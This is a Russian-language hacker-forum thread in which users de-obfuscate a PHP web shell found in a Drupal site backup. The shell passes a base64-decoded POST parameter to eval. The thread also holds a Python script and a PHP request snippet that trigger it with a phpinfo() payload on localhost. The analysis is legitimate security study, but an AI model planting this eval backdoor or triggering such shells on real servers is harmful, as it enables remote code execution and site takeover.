PDA

Просмотр полной версии : php-"вирус" в Друпале

rct
25.09.2015, 13:37
Нашел такой код


PHP:


Моих поверхностных знаний пхп хватило, так сказать, отреверсить что тут вообще происходит =)

Получается вот такой код


PHP:
if

(isset($POST['n828e00'])) {

eval($base64_decode($_POST['n828e00']));

}

То есть, теоретически, POST-запрос вида http://site.com/index.php?n828e00=cGhwaW5mbygpOw== должен вывести выхлоп phpinfo(). Накатил быстренько скрипт на питоне чтобы потестить на локалхосте, но у никакого выхлопа от phpinfo() нету. Эксплоит

import requests

payload = {"n828e00" : "cGhwaW5mbygpOw=="}

r = requests.post("http://localhost/viros.php", params=payload)

Помогите разобраться как этот пхп работает
hesher
25.09.2015, 15:51
Все правильно работает, у тебя только там в "декодированном" скрипте описка. Если ты его использовал, то может из-за этого не работал. Правильная версия:


PHP:
array(
'method'=>'POST',
'header'=>'Content-type: application/x-www-form-urlencoded',
'content'=>http_build_query(array('n828e00'=>'cGhwaW5mbygpOw=='))
)
)));
rct
25.09.2015, 16:01
hesher said:
↑ (https://antichat.live/posts/3894964/)
Все правильно работает, у тебя только там в "декодированном" скрипте описка. Если ты его использовал, то может из-за этого не работал. Правильная версия:

PHP:
array(
'method'=>'POST',
'header'=>'Content-type: application/x-www-form-urlencoded',
'content'=>http_build_query(array('n828e00'=>'cGhwaW5mbygpOw=='))
)
)));



Дело в том, что это не моё Я слил бэкап сайта, а сам шелл нашел случайно.

Я правильно понимаю что не рабоатает из-за eval($s21(${$s20}['n828e00'])); где ошибка именно в $s21 когда должно быть ${$s21} ?
grimnir
25.09.2015, 16:15
http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/

http://mattgreensmith.net/2015/01/11/deobfuscating-php-malware/
rct
25.09.2015, 16:18
grimnir said:
↑ (https://antichat.live/posts/3894980/)
http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/
http://mattgreensmith.net/2015/01/11/deobfuscating-php-malware/


Ну я вообще первым делом гуглить пошел Просто не понимаю почему на локалхосте не работает.
rct
25.09.2015, 16:22
hesher said:
↑ (https://antichat.live/posts/3894964/)
Все правильно работает, у тебя только там в "декодированном" скрипте описка. Если ты его использовал, то может из-за этого не работал. Правильная версия:

PHP:
array(
'method'=>'POST',
'header'=>'Content-type: application/x-www-form-urlencoded',
'content'=>http_build_query(array('n828e00'=>'cGhwaW5mbygpOw=='))
)
)));



А вот этим скриптом всё отрабатывается. Проблема на моей стороне( Благодарю за помощь.